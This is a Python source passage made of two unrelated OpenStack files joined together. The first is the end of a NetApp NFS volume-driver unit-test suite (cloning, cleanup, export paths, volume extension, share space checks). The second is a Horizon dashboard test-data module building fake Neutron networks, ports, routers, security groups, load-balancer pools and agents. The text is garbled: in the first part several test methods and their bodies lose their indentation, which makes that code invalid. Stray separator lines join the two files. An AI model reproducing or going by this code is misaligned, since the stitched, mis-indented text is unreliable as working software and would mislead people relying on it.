        self.assertRaises(exception.CinderException,
                          self.driver._clone_with_extension_check,
                          fake.CLONE_SOURCE,
                          fake.NFS_VOLUME)
def test_create_cloned_volume(self):
provider_location = fake.POOL_NAME
src_vref = fake.CLONE_SOURCE
self.mock_object(self.driver, '_clone_source_to_destination_volume',
mock.Mock(return_value=provider_location))
result = self.driver.create_cloned_volume(fake.NFS_VOLUME,
src_vref)
self.assertEqual(provider_location, result)
def test_do_qos_for_volume(self):
self.assertRaises(NotImplementedError,
self.driver._do_qos_for_volume,
fake.NFS_VOLUME,
fake.EXTRA_SPECS)
    def test_cleanup_volume_on_failure(self):
        """Cleanup deletes the backing file when it exists on disk."""
        path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
        mock_local_path = self.mock_object(self.driver, 'local_path')
        mock_local_path.return_value = path
        mock_exists_check = self.mock_object(os.path, 'exists')
        mock_exists_check.return_value = True
        mock_delete = self.mock_object(self.driver, '_delete_file_at_path')
        self.driver._cleanup_volume_on_failure(fake.NFS_VOLUME)
        mock_delete.assert_has_calls([mock.call(path)])
    def test_cleanup_volume_on_failure_no_path(self):
        """Cleanup is a no-op when the backing file is absent."""
        self.mock_object(self.driver, 'local_path')
        mock_exists_check = self.mock_object(os.path, 'exists')
        mock_exists_check.return_value = False
        mock_delete = self.mock_object(self.driver, '_delete_file_at_path')
        self.driver._cleanup_volume_on_failure(fake.NFS_VOLUME)
        self.assertEqual(0, mock_delete.call_count)
def test_get_vol_for_share(self):
self.assertRaises(NotImplementedError,
self.driver._get_vol_for_share,
fake.NFS_SHARE)
    def test_get_export_ip_path_volume_id_provided(self):
        """_get_export_ip_path resolves host ip and export path from the
        volume id."""
        mock_get_host_ip = self.mock_object(self.driver, '_get_host_ip')
        mock_get_host_ip.return_value = fake.IPV4_ADDRESS
        mock_get_export_path = self.mock_object(
            self.driver, '_get_export_path')
        mock_get_export_path.return_value = fake.EXPORT_PATH
        expected = (fake.IPV4_ADDRESS, fake.EXPORT_PATH)
        result = self.driver._get_export_ip_path(fake.VOLUME_ID)
        self.assertEqual(expected, result)
def test_get_export_ip_path_share_provided(self):
expected = (fake.SHARE_IP, fake.EXPORT_PATH)
result = self.driver._get_export_ip_path(share=fake.NFS_SHARE)
self.assertEqual(expected, result)
    def test_get_export_ip_path_volume_id_and_share_provided(self):
        """The volume id lookup takes precedence when both a volume id
        and a share are given."""
        mock_get_host_ip = self.mock_object(self.driver, '_get_host_ip')
        mock_get_host_ip.return_value = fake.IPV4_ADDRESS
        mock_get_export_path = self.mock_object(
            self.driver, '_get_export_path')
        mock_get_export_path.return_value = fake.EXPORT_PATH
        expected = (fake.IPV4_ADDRESS, fake.EXPORT_PATH)
        result = self.driver._get_export_ip_path(
            fake.VOLUME_ID, fake.NFS_SHARE)
        self.assertEqual(expected, result)
    def test_get_export_ip_path_no_args(self):
        """_get_export_ip_path requires either a volume id or a share."""
        self.assertRaises(exception.InvalidInput,
                          self.driver._get_export_ip_path)
def test_get_host_ip(self):
mock_get_provider_location = self.mock_object(
self.driver, '_get_provider_location')
mock_get_provider_location.return_value = fake.NFS_SHARE
expected = fake.SHARE_IP
result = self.driver._get_host_ip(fake.VOLUME_ID)
self.assertEqual(expected, result)
def test_get_export_path(self):
mock_get_provider_location = self.mock_object(
self.driver, '_get_provider_location')
mock_get_provider_location.return_value = fake.NFS_SHARE
expected = fake.EXPORT_PATH
result = self.driver._get_export_path(fake.VOLUME_ID)
self.assertEqual(expected, result)
    def test_extend_volume(self):
        """extend_volume resizes the image file and reapplies QoS using
        the new size."""
        new_size = 100
        volume_copy = copy.copy(fake.VOLUME)
        volume_copy['size'] = new_size
        path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
        self.mock_object(self.driver,
                         'local_path',
                         mock.Mock(return_value=path))
        mock_resize_image_file = self.mock_object(self.driver,
                                                  '_resize_image_file')
        mock_get_volume_extra_specs = self.mock_object(
            na_utils, 'get_volume_extra_specs',
            mock.Mock(return_value=fake.EXTRA_SPECS))
        mock_do_qos_for_volume = self.mock_object(self.driver,
                                                  '_do_qos_for_volume')
        self.driver.extend_volume(fake.VOLUME, new_size)
        mock_resize_image_file.assert_called_once_with(path, new_size)
        mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
        mock_do_qos_for_volume.assert_called_once_with(volume_copy,
                                                       fake.EXTRA_SPECS,
                                                       cleanup=False)
    def test_extend_volume_resize_error(self):
        """A resize failure surfaces as VolumeBackendAPIException and
        skips the QoS step entirely."""
        new_size = 100
        volume_copy = copy.copy(fake.VOLUME)
        volume_copy['size'] = new_size
        path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
        self.mock_object(self.driver,
                         'local_path',
                         mock.Mock(return_value=path))
        mock_resize_image_file = self.mock_object(
            self.driver, '_resize_image_file',
            mock.Mock(side_effect=netapp_api.NaApiError))
        mock_get_volume_extra_specs = self.mock_object(
            na_utils, 'get_volume_extra_specs',
            mock.Mock(return_value=fake.EXTRA_SPECS))
        mock_do_qos_for_volume = self.mock_object(self.driver,
                                                  '_do_qos_for_volume')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.driver.extend_volume,
                          fake.VOLUME,
                          new_size)
        mock_resize_image_file.assert_called_once_with(path, new_size)
        self.assertFalse(mock_get_volume_extra_specs.called)
        self.assertFalse(mock_do_qos_for_volume.called)
def test_extend_volume_qos_error(self):
    """A QoS failure after a successful resize raises to the caller."""
    requested_size = 100
    expected_volume = copy.copy(fake.VOLUME)
    expected_volume['size'] = requested_size
    volume_path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])

    self.mock_object(self.driver, 'local_path',
                     mock.Mock(return_value=volume_path))
    resize_mock = self.mock_object(self.driver, '_resize_image_file')
    extra_specs_mock = self.mock_object(
        na_utils, 'get_volume_extra_specs',
        mock.Mock(return_value=fake.EXTRA_SPECS))
    qos_mock = self.mock_object(
        self.driver, '_do_qos_for_volume',
        mock.Mock(side_effect=netapp_api.NaApiError))

    self.assertRaises(exception.VolumeBackendAPIException,
                      self.driver.extend_volume,
                      fake.VOLUME,
                      requested_size)

    # The resize and extra-spec lookup both completed; only QoS failed.
    resize_mock.assert_called_once_with(volume_path, requested_size)
    extra_specs_mock.assert_called_once_with(fake.VOLUME)
    qos_mock.assert_called_once_with(expected_volume,
                                     fake.EXTRA_SPECS,
                                     cleanup=False)
def test_is_share_clone_compatible(self):
    """The base driver defers share compatibility checks to subclasses."""
    self.assertRaises(
        NotImplementedError,
        self.driver._is_share_clone_compatible,
        fake.NFS_VOLUME,
        fake.NFS_SHARE)
@ddt.data(
    {'size': 12, 'thin': False, 'over': 1.0, 'res': 0, 'expected': True},
    {'size': 12, 'thin': False, 'over': 1.0, 'res': 5, 'expected': False},
    {'size': 12, 'thin': True, 'over': 1.0, 'res': 5, 'expected': False},
    {'size': 12, 'thin': True, 'over': 1.1, 'res': 5, 'expected': True},
    {'size': 240, 'thin': True, 'over': 20.0, 'res': 0, 'expected': True},
    {'size': 241, 'thin': True, 'over': 20.0, 'res': 0, 'expected': False},
)
@ddt.unpack
def test_share_has_space_for_clone(self, size, thin, over, res, expected):
    """Clone fits iff the share's free/oversubscribed space covers *size*."""
    total_bytes = 20 * units.Gi
    available_bytes = 12 * units.Gi

    # Patch capacity, oversubscription ratio and reserve in one statement
    # instead of three nested with-blocks; behavior is identical.
    with mock.patch.object(self.driver, '_get_capacity_info',
                           return_value=(total_bytes, available_bytes)), \
            mock.patch.object(self.driver,
                              'max_over_subscription_ratio', over), \
            mock.patch.object(self.driver, 'reserved_percentage', res):
        result = self.driver._share_has_space_for_clone(fake.NFS_SHARE,
                                                        size,
                                                        thin=thin)
        self.assertEqual(expected, result)
@ddt.data(
    {'size': 12, 'thin': False, 'over': 1.0, 'res': 0, 'expected': True},
    {'size': 12, 'thin': False, 'over': 1.0, 'res': 5, 'expected': False},
    {'size': 12, 'thin': True, 'over': 1.0, 'res': 5, 'expected': False},
    {'size': 12, 'thin': True, 'over': 1.1, 'res': 5, 'expected': True},
    {'size': 240, 'thin': True, 'over': 20.0, 'res': 0, 'expected': True},
    {'size': 241, 'thin': True, 'over': 20.0, 'res': 0, 'expected': False},
)
@ddt.unpack
@mock.patch.object(nfs_base.NetAppNfsDriver, '_get_capacity_info')
def test_share_has_space_for_clone2(self,
                                    mock_get_capacity,
                                    size, thin, over, res, expected):
    """Same as test_share_has_space_for_clone, but capacity is patched
    via a decorator on the class rather than a context manager."""
    mock_get_capacity.return_value = (20 * units.Gi, 12 * units.Gi)

    # Collapse the two nested with-blocks into a single statement.
    with mock.patch.object(self.driver,
                           'max_over_subscription_ratio', over), \
            mock.patch.object(self.driver, 'reserved_percentage', res):
        result = self.driver._share_has_space_for_clone(fake.NFS_SHARE,
                                                        size,
                                                        thin=thin)
        self.assertEqual(expected, result)
|
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
from openstack_dashboard.api import base
from openstack_dashboard.api import fwaas
from openstack_dashboard.api import lbaas
from openstack_dashboard.api import neutron
from openstack_dashboard.api import vpn
from openstack_dashboard.test.test_data import utils
def data(TEST):
    """Populate ``TEST`` with Neutron, LBaaS, VPNaaS and FWaaS test data.

    Two parallel sets of containers are filled:

    * ``TEST.<name>`` -- objects wrapped the way the
      ``openstack_dashboard.api`` modules (``neutron``, ``lbaas``, ``vpn``,
      ``fwaas``) return them, i.e. what Horizon code consumes.
    * ``TEST.api_<name>`` -- the raw dicts as returned by neutronclient.
    """
    # data returned by openstack_dashboard.api.neutron wrapper
    TEST.agents = utils.TestDataContainer()
    TEST.networks = utils.TestDataContainer()
    TEST.subnets = utils.TestDataContainer()
    TEST.ports = utils.TestDataContainer()
    TEST.routers = utils.TestDataContainer()
    TEST.q_floating_ips = utils.TestDataContainer()
    TEST.q_secgroups = utils.TestDataContainer()
    TEST.q_secgroup_rules = utils.TestDataContainer()
    TEST.providers = utils.TestDataContainer()
    TEST.pools = utils.TestDataContainer()
    TEST.vips = utils.TestDataContainer()
    TEST.members = utils.TestDataContainer()
    TEST.monitors = utils.TestDataContainer()
    TEST.neutron_quotas = utils.TestDataContainer()
    TEST.net_profiles = utils.TestDataContainer()
    TEST.policy_profiles = utils.TestDataContainer()
    TEST.network_profile_binding = utils.TestDataContainer()
    TEST.policy_profile_binding = utils.TestDataContainer()
    TEST.vpnservices = utils.TestDataContainer()
    TEST.ikepolicies = utils.TestDataContainer()
    TEST.ipsecpolicies = utils.TestDataContainer()
    TEST.ipsecsiteconnections = utils.TestDataContainer()
    TEST.firewalls = utils.TestDataContainer()
    TEST.fw_policies = utils.TestDataContainer()
    TEST.fw_rules = utils.TestDataContainer()

    # data returned by neutronclient
    TEST.api_agents = utils.TestDataContainer()
    TEST.api_networks = utils.TestDataContainer()
    TEST.api_subnets = utils.TestDataContainer()
    TEST.api_ports = utils.TestDataContainer()
    TEST.api_routers = utils.TestDataContainer()
    TEST.api_q_floating_ips = utils.TestDataContainer()
    TEST.api_q_secgroups = utils.TestDataContainer()
    TEST.api_q_secgroup_rules = utils.TestDataContainer()
    TEST.api_pools = utils.TestDataContainer()
    TEST.api_vips = utils.TestDataContainer()
    TEST.api_members = utils.TestDataContainer()
    TEST.api_monitors = utils.TestDataContainer()
    TEST.api_extensions = utils.TestDataContainer()
    TEST.api_net_profiles = utils.TestDataContainer()
    TEST.api_policy_profiles = utils.TestDataContainer()
    TEST.api_network_profile_binding = utils.TestDataContainer()
    TEST.api_policy_profile_binding = utils.TestDataContainer()
    TEST.api_vpnservices = utils.TestDataContainer()
    TEST.api_ikepolicies = utils.TestDataContainer()
    TEST.api_ipsecpolicies = utils.TestDataContainer()
    TEST.api_ipsecsiteconnections = utils.TestDataContainer()
    TEST.api_firewalls = utils.TestDataContainer()
    TEST.api_fw_policies = utils.TestDataContainer()
    TEST.api_fw_rules = utils.TestDataContainer()

    #------------------------------------------------------------
    # 1st network
    network_dict = {'admin_state_up': True,
                    'id': '82288d84-e0a5-42ac-95be-e6af08727e42',
                    'name': 'net1',
                    'status': 'ACTIVE',
                    'subnets': ['e8abc972-eb0c-41f1-9edd-4bc6e3bcd8c9'],
                    'tenant_id': '1',
                    'router:external': False,
                    'shared': False}
    subnet_dict = {'allocation_pools': [{'end': '10.0.0.254',
                                         'start': '10.0.0.2'}],
                   'dns_nameservers': [],
                   'host_routes': [],
                   'cidr': '10.0.0.0/24',
                   'enable_dhcp': True,
                   'gateway_ip': '10.0.0.1',
                   'id': network_dict['subnets'][0],
                   'ip_version': 4,
                   'name': 'mysubnet1',
                   'network_id': network_dict['id'],
                   'tenant_id': network_dict['tenant_id']}

    TEST.api_networks.add(network_dict)
    TEST.api_subnets.add(subnet_dict)

    network = copy.deepcopy(network_dict)
    subnet = neutron.Subnet(subnet_dict)
    network['subnets'] = [subnet]
    TEST.networks.add(neutron.Network(network))
    TEST.subnets.add(subnet)

    # network profile for network when using the cisco n1k plugin
    net_profile_dict = {'name': 'net_profile_test1',
                        'segment_type': 'vlan',
                        'physical_network': 'phys1',
                        'segment_range': '3000-31000',
                        'id':
                        '00000000-1111-1111-1111-000000000000',
                        'tenant_id': network_dict['tenant_id']}

    TEST.api_net_profiles.add(net_profile_dict)
    TEST.net_profiles.add(neutron.Profile(net_profile_dict))

    # policy profile for port when using the cisco n1k plugin
    policy_profile_dict = {'name': 'policy_profile_test1',
                           'id':
                           '00000000-9999-9999-9999-000000000000'}

    TEST.api_policy_profiles.add(policy_profile_dict)
    TEST.policy_profiles.add(neutron.Profile(policy_profile_dict))

    # network profile binding
    network_profile_binding_dict = {'profile_id':
                                    '00000000-1111-1111-1111-000000000000',
                                    'tenant_id': network_dict['tenant_id']}

    TEST.api_network_profile_binding.add(network_profile_binding_dict)
    TEST.network_profile_binding.add(neutron.Profile(
        network_profile_binding_dict))

    # policy profile binding
    policy_profile_binding_dict = {'profile_id':
                                   '00000000-9999-9999-9999-000000000000',
                                   'tenant_id': network_dict['tenant_id']}

    TEST.api_policy_profile_binding.add(policy_profile_binding_dict)
    TEST.policy_profile_binding.add(neutron.Profile(
        policy_profile_binding_dict))

    # ports on 1st network
    port_dict = {'admin_state_up': True,
                 'device_id': 'af75c8e5-a1cc-4567-8d04-44fcd6922890',
                 'device_owner': 'network:dhcp',
                 'fixed_ips': [{'ip_address': '10.0.0.3',
                                'subnet_id': subnet_dict['id']}],
                 'id': '063cf7f3-ded1-4297-bc4c-31eae876cc91',
                 'mac_address': 'fa:16:3e:9c:d5:7e',
                 'name': '',
                 'network_id': network_dict['id'],
                 'status': 'ACTIVE',
                 'tenant_id': network_dict['tenant_id']}

    TEST.api_ports.add(port_dict)
    TEST.ports.add(neutron.Port(port_dict))

    port_dict = {'admin_state_up': True,
                 'device_id': '1',
                 'device_owner': 'compute:nova',
                 'fixed_ips': [{'ip_address': '10.0.0.4',
                                'subnet_id': subnet_dict['id']}],
                 'id': '7e6ce62c-7ea2-44f8-b6b4-769af90a8406',
                 'mac_address': 'fa:16:3e:9d:e6:2f',
                 'name': '',
                 'network_id': network_dict['id'],
                 'status': 'ACTIVE',
                 'tenant_id': network_dict['tenant_id']}

    TEST.api_ports.add(port_dict)
    TEST.ports.add(neutron.Port(port_dict))
    # Remembered so the associated floating IP below can reference it.
    assoc_port = port_dict

    #------------------------------------------------------------
    # 2nd network
    network_dict = {'admin_state_up': True,
                    'id': '72c3ab6c-c80f-4341-9dc5-210fa31ac6c2',
                    'name': 'net2',
                    'status': 'ACTIVE',
                    'subnets': ['3f7c5d79-ee55-47b0-9213-8e669fb03009'],
                    'tenant_id': '2',
                    'router:external': False,
                    'shared': True}
    subnet_dict = {'allocation_pools': [{'end': '172.16.88.254',
                                         'start': '172.16.88.2'}],
                   'dns_nameservers': ['10.56.1.20', '10.56.1.21'],
                   'host_routes': [{'destination': '192.168.20.0/24',
                                    'nexthop': '172.16.88.253'},
                                   {'destination': '192.168.21.0/24',
                                    'nexthop': '172.16.88.252'}],
                   'cidr': '172.16.88.0/24',
                   'enable_dhcp': True,
                   'gateway_ip': '172.16.88.1',
                   'id': '3f7c5d79-ee55-47b0-9213-8e669fb03009',
                   'ip_version': 4,
                   'name': 'aaaa',
                   'network_id': network_dict['id'],
                   'tenant_id': network_dict['tenant_id']}

    TEST.api_networks.add(network_dict)
    TEST.api_subnets.add(subnet_dict)

    network = copy.deepcopy(network_dict)
    subnet = neutron.Subnet(subnet_dict)
    network['subnets'] = [subnet]
    TEST.networks.add(neutron.Network(network))
    TEST.subnets.add(subnet)

    port_dict = {'admin_state_up': True,
                 'device_id': '2',
                 'device_owner': 'compute:nova',
                 'fixed_ips': [{'ip_address': '172.16.88.3',
                                'subnet_id': subnet_dict['id']}],
                 'id': '1db2cc37-3553-43fa-b7e2-3fc4eb4f9905',
                 'mac_address': 'fa:16:3e:56:e6:2f',
                 'name': '',
                 'network_id': network_dict['id'],
                 'status': 'ACTIVE',
                 'tenant_id': network_dict['tenant_id']}

    TEST.api_ports.add(port_dict)
    TEST.ports.add(neutron.Port(port_dict))

    #------------------------------------------------------------
    # external network
    network_dict = {'admin_state_up': True,
                    'id': '9b466b94-213a-4cda-badf-72c102a874da',
                    'name': 'ext_net',
                    'status': 'ACTIVE',
                    'subnets': ['d6bdc71c-7566-4d32-b3ff-36441ce746e8'],
                    'tenant_id': '3',
                    'router:external': True,
                    'shared': False}
    # NOTE: the start address previously carried a stray trailing '.'
    # ('172.24.4.226.'), which is not a valid IPv4 address.
    subnet_dict = {'allocation_pools': [{'start': '172.24.4.226',
                                         'end': '172.24.4.238'}],
                   'dns_nameservers': [],
                   'host_routes': [],
                   'cidr': '172.24.4.0/28',
                   'enable_dhcp': False,
                   'gateway_ip': '172.24.4.225',
                   'id': 'd6bdc71c-7566-4d32-b3ff-36441ce746e8',
                   'ip_version': 4,
                   'name': 'ext_subnet',
                   'network_id': network_dict['id'],
                   'tenant_id': network_dict['tenant_id']}
    ext_net = network_dict

    TEST.api_networks.add(network_dict)
    TEST.api_subnets.add(subnet_dict)

    network = copy.deepcopy(network_dict)
    subnet = neutron.Subnet(subnet_dict)
    network['subnets'] = [subnet]
    TEST.networks.add(neutron.Network(network))
    TEST.subnets.add(subnet)

    #------------------------------------------------------------
    # Set up router data
    port_dict = {'admin_state_up': True,
                 'device_id': '7180cede-bcd8-4334-b19f-f7ef2f331f53',
                 'device_owner': 'network:router_gateway',
                 'fixed_ips': [{'ip_address': '10.0.0.3',
                                'subnet_id': subnet_dict['id']}],
                 'id': '44ec6726-4bdc-48c5-94d4-df8d1fbf613b',
                 'mac_address': 'fa:16:3e:9c:d5:7e',
                 'name': '',
                 'network_id': network_dict['id'],
                 'status': 'ACTIVE',
                 'tenant_id': '1'}

    TEST.api_ports.add(port_dict)
    TEST.ports.add(neutron.Port(port_dict))

    router_dict = {'id': '279989f7-54bb-41d9-ba42-0d61f12fda61',
                   'name': 'router1',
                   'external_gateway_info':
                       {'network_id': ext_net['id']},
                   'tenant_id': '1'}
    TEST.api_routers.add(router_dict)
    TEST.routers.add(neutron.Router(router_dict))

    router_dict = {'id': '10e3dc42-1ce1-4d48-87cf-7fc333055d6c',
                   'name': 'router2',
                   'external_gateway_info':
                       {'network_id': ext_net['id']},
                   'tenant_id': '1'}
    TEST.api_routers.add(router_dict)
    TEST.routers.add(neutron.Router(router_dict))

    #------------------------------------------------------------
    # floating IP
    # unassociated
    fip_dict = {'tenant_id': '1',
                'floating_ip_address': '172.16.88.227',
                'floating_network_id': ext_net['id'],
                'id': '9012cd70-cfae-4e46-b71e-6a409e9e0063',
                'fixed_ip_address': None,
                'port_id': None,
                'router_id': None}
    TEST.api_q_floating_ips.add(fip_dict)
    TEST.q_floating_ips.add(neutron.FloatingIp(fip_dict))

    # associated (with compute port on 1st network)
    fip_dict = {'tenant_id': '1',
                'floating_ip_address': '172.16.88.228',
                'floating_network_id': ext_net['id'],
                'id': 'a97af8f2-3149-4b97-abbd-e49ad19510f7',
                'fixed_ip_address': assoc_port['fixed_ips'][0]['ip_address'],
                'port_id': assoc_port['id'],
                'router_id': router_dict['id']}
    TEST.api_q_floating_ips.add(fip_dict)
    TEST.q_floating_ips.add(neutron.FloatingIp(fip_dict))

    #------------------------------------------------------------
    # security group
    sec_group_1 = {'tenant_id': '1',
                   'description': 'default',
                   'id': 'faad7c80-3b62-4440-967c-13808c37131d',
                   'name': 'default'}
    sec_group_2 = {'tenant_id': '1',
                   'description': 'NotDefault',
                   'id': '27a5c9a1-bdbb-48ac-833a-2e4b5f54b31d',
                   'name': 'other_group'}
    sec_group_3 = {'tenant_id': '1',
                   'description': 'NotDefault',
                   'id': '443a4d7a-4bd2-4474-9a77-02b35c9f8c95',
                   'name': 'another_group'}

    def add_rule_to_group(secgroup, default_only=True):
        """Attach security group rules (with random ids) to *secgroup*.

        The two default egress rules are always added; when *default_only*
        is False, a TCP/80 rule, an ICMP rule and a remote-group rule are
        added as well so the group has ingress rules to display.
        """
        rule_egress_ipv4 = {
            'id': str(uuid.uuid4()),
            'direction': u'egress', 'ethertype': u'IPv4',
            'port_range_min': None, 'port_range_max': None,
            'protocol': None, 'remote_group_id': None,
            'remote_ip_prefix': None,
            'security_group_id': secgroup['id'],
            'tenant_id': secgroup['tenant_id']}
        rule_egress_ipv6 = {
            'id': str(uuid.uuid4()),
            'direction': u'egress', 'ethertype': u'IPv6',
            'port_range_min': None, 'port_range_max': None,
            'protocol': None, 'remote_group_id': None,
            'remote_ip_prefix': None,
            'security_group_id': secgroup['id'],
            'tenant_id': secgroup['tenant_id']}
        rule_tcp_80 = {
            'id': str(uuid.uuid4()),
            'direction': u'ingress', 'ethertype': u'IPv4',
            'port_range_min': 80, 'port_range_max': 80,
            'protocol': u'tcp', 'remote_group_id': None,
            'remote_ip_prefix': u'0.0.0.0/0',
            'security_group_id': secgroup['id'],
            'tenant_id': secgroup['tenant_id']}
        rule_icmp = {
            'id': str(uuid.uuid4()),
            'direction': u'ingress', 'ethertype': u'IPv4',
            'port_range_min': 5, 'port_range_max': 8,
            'protocol': u'icmp', 'remote_group_id': None,
            'remote_ip_prefix': u'0.0.0.0/0',
            'security_group_id': secgroup['id'],
            'tenant_id': secgroup['tenant_id']}
        rule_group = {
            'id': str(uuid.uuid4()),
            'direction': u'ingress', 'ethertype': u'IPv4',
            'port_range_min': 80, 'port_range_max': 80,
            'protocol': u'tcp', 'remote_group_id': sec_group_1['id'],
            'remote_ip_prefix': None,
            'security_group_id': secgroup['id'],
            'tenant_id': secgroup['tenant_id']}

        rules = []
        if not default_only:
            rules += [rule_tcp_80, rule_icmp, rule_group]
        rules += [rule_egress_ipv4, rule_egress_ipv6]
        secgroup['security_group_rules'] = rules

    add_rule_to_group(sec_group_1, default_only=False)
    add_rule_to_group(sec_group_2)
    add_rule_to_group(sec_group_3)

    groups = [sec_group_1, sec_group_2, sec_group_3]
    sg_name_dict = dict([(sg['id'], sg['name']) for sg in groups])
    for sg in groups:
        # Neutron API
        TEST.api_q_secgroups.add(sg)
        for rule in sg['security_group_rules']:
            TEST.api_q_secgroup_rules.add(copy.copy(rule))
        # OpenStack Dashboard internal API
        TEST.q_secgroups.add(
            neutron.SecurityGroup(copy.deepcopy(sg), sg_name_dict))
        for rule in sg['security_group_rules']:
            TEST.q_secgroup_rules.add(
                neutron.SecurityGroupRule(copy.copy(rule), sg_name_dict))

    #------------------------------------------------------------
    # LBaaS

    # 1st pool
    pool_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d49',
                 'tenant_id': '1',
                 'vip_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
                 'name': 'pool1',
                 'description': 'pool description',
                 'subnet_id': TEST.subnets.first().id,
                 'protocol': 'HTTP',
                 'lb_method': 'ROUND_ROBIN',
                 'health_monitors': ['d4a0500f-db2b-4cc4-afcf-ec026febff96'],
                 'admin_state_up': True,
                 'provider': 'haproxy'}
    TEST.api_pools.add(pool_dict)
    TEST.pools.add(lbaas.Pool(pool_dict))

    # 1st vip
    vip_dict = {'id': 'abcdef-c3eb-4fee-9763-12de3338041e',
                'name': 'vip1',
                'address': '10.0.0.100',
                'floatip_address': '',
                'other_address': '10.0.0.100',
                'description': 'vip description',
                'subnet_id': TEST.subnets.first().id,
                'subnet': TEST.subnets.first().cidr,
                'protocol_port': 80,
                'protocol': pool_dict['protocol'],
                'pool_id': pool_dict['id'],
                'session_persistence': {'type': 'APP_COOKIE',
                                        'cookie_name': 'jssessionid'},
                'connection_limit': 10,
                'admin_state_up': True}
    TEST.api_vips.add(vip_dict)
    TEST.vips.add(lbaas.Vip(vip_dict))

    # 2nd vip
    vip_dict = {'id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
                'name': 'vip2',
                'address': '10.0.0.110',
                'floatip_address': '',
                'other_address': '10.0.0.110',
                'description': 'vip description',
                'subnet_id': TEST.subnets.first().id,
                'subnet': TEST.subnets.first().cidr,
                'protocol_port': 80,
                'protocol': pool_dict['protocol'],
                'pool_id': pool_dict['id'],
                'session_persistence': {'type': 'APP_COOKIE',
                                        'cookie_name': 'jssessionid'},
                'connection_limit': 10,
                'admin_state_up': True}
    TEST.api_vips.add(vip_dict)
    TEST.vips.add(lbaas.Vip(vip_dict))

    # 1st member
    member_dict = {'id': '78a46e5e-eb1a-418a-88c7-0e3f5968b08',
                   'tenant_id': '1',
                   'pool_id': pool_dict['id'],
                   'address': '10.0.0.11',
                   'protocol_port': 80,
                   'weight': 10,
                   'admin_state_up': True}
    TEST.api_members.add(member_dict)
    TEST.members.add(lbaas.Member(member_dict))

    # 2nd member
    member_dict = {'id': '41ac1f8d-6d9c-49a4-a1bf-41955e651f91',
                   'tenant_id': '1',
                   'pool_id': pool_dict['id'],
                   'address': '10.0.0.12',
                   'protocol_port': 80,
                   'weight': 10,
                   'admin_state_up': True}
    TEST.api_members.add(member_dict)
    TEST.members.add(lbaas.Member(member_dict))

    # 2nd pool
    pool_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d50',
                 'tenant_id': '1',
                 'vip_id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
                 'name': 'pool2',
                 'description': 'pool description',
                 'subnet_id': TEST.subnets.first().id,
                 'protocol': 'HTTPS',
                 'lb_method': 'ROUND_ROBIN',
                 'health_monitors': ['d4a0500f-db2b-4cc4-afcf-ec026febff97'],
                 'admin_state_up': True}
    TEST.api_pools.add(pool_dict)
    TEST.pools.add(lbaas.Pool(pool_dict))

    # 1st monitor
    monitor_dict = {'id': 'd4a0500f-db2b-4cc4-afcf-ec026febff96',
                    'type': 'ping',
                    'delay': 10,
                    'timeout': 10,
                    'max_retries': 10,
                    'http_method': 'GET',
                    'url_path': '/',
                    'expected_codes': '200',
                    'admin_state_up': True}
    TEST.api_monitors.add(monitor_dict)
    TEST.monitors.add(lbaas.PoolMonitor(monitor_dict))

    # 2nd monitor
    monitor_dict = {'id': 'd4a0500f-db2b-4cc4-afcf-ec026febff97',
                    'type': 'ping',
                    'delay': 10,
                    'timeout': 10,
                    'max_retries': 10,
                    'http_method': 'GET',
                    'url_path': '/',
                    'expected_codes': '200',
                    'admin_state_up': True}
    TEST.api_monitors.add(monitor_dict)
    TEST.monitors.add(lbaas.PoolMonitor(monitor_dict))

    #------------------------------------------------------------
    # Quotas
    quota_data = {'network': '10',
                  'subnet': '10',
                  'port': '50',
                  'router': '10',
                  'floatingip': '50',
                  'security_group': '20',
                  'security_group_rule': '100',
                  }
    TEST.neutron_quotas.add(base.QuotaSet(quota_data))

    #------------------------------------------------------------
    # Extensions
    extension_1 = {"name": "security-group",
                   "alias": "security-group",
                   "description": "The security groups extension."}
    extension_2 = {"name": "Quota management support",
                   "alias": "quotas",
                   "description": "Expose functions for quotas management"}
    TEST.api_extensions.add(extension_1)
    TEST.api_extensions.add(extension_2)

    #------------------------------------------------------------
    # 1st agent
    agent_dict = {"binary": "neutron-openvswitch-agent",
                  "description": None,
                  "admin_state_up": True,
                  "heartbeat_timestamp": "2013-07-26 06:51:47",
                  "alive": True,
                  "id": "c876ff05-f440-443e-808c-1d34cda3e88a",
                  "topic": "N/A",
                  "host": "devstack001",
                  "agent_type": "Open vSwitch agent",
                  "started_at": "2013-07-26 05:23:28",
                  "created_at": "2013-07-26 05:23:28",
                  "configurations": {"devices": 2}}
    TEST.api_agents.add(agent_dict)
    TEST.agents.add(neutron.Agent(agent_dict))

    # 2nd agent
    agent_dict = {"binary": "neutron-dhcp-agent",
                  "description": None,
                  "admin_state_up": True,
                  "heartbeat_timestamp": "2013-07-26 06:51:48",
                  "alive": True,
                  "id": "f0d12e3d-1973-41a2-b977-b95693f9a8aa",
                  "topic": "dhcp_agent",
                  "host": "devstack001",
                  "agent_type": "DHCP agent",
                  "started_at": "2013-07-26 05:23:30",
                  "created_at": "2013-07-26 05:23:30",
                  "configurations": {
                      "subnets": 1,
                      "use_namespaces": True,
                      "dhcp_lease_duration": 120,
                      "dhcp_driver": "neutron.agent.linux.dhcp.Dnsmasq",
                      "networks": 1,
                      "ports": 1}}
    TEST.api_agents.add(agent_dict)
    TEST.agents.add(neutron.Agent(agent_dict))

    #------------------------------------------------------------
    # Service providers
    provider_1 = {"service_type": "LOADBALANCER",
                  "name": "haproxy",
                  "default": True}
    TEST.providers.add(provider_1)

    #------------------------------------------------------------
    # VPNaaS

    # 1st VPNService
